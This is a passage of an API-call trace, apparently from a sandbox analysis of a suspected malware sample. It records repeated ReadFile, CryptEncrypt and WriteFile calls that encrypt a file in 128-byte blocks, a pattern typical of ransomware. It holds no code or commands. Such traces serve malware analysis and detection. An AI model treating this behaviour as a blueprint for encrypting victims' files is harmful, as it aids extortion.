lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.668] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.668] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.668] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.668] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.668] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.668] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.668] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.668] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.668] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.668] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.668] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.668] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.668] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.668] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.668] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.669] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.669] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.669] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.669] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.669] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.669] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.669] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.669] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.669] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.669] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.669] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.669] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.669] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.669] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.669] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.669] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.669] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.669] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.669] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.669] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.670] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.670] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.670] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.670] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.670] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.670] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.670] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.670] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.670] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.670] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.670] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.670] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.670] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.670] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.670] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.671] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.671] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.671] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.671] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.671] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.671] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.671] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.671] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.671] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.672] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.672] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.672] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.672] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.672] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.672] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.672] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.672] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.672] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.672] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.672] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.672] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.672] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.672] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.672] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.673] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.673] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.673] WriteFile (in: 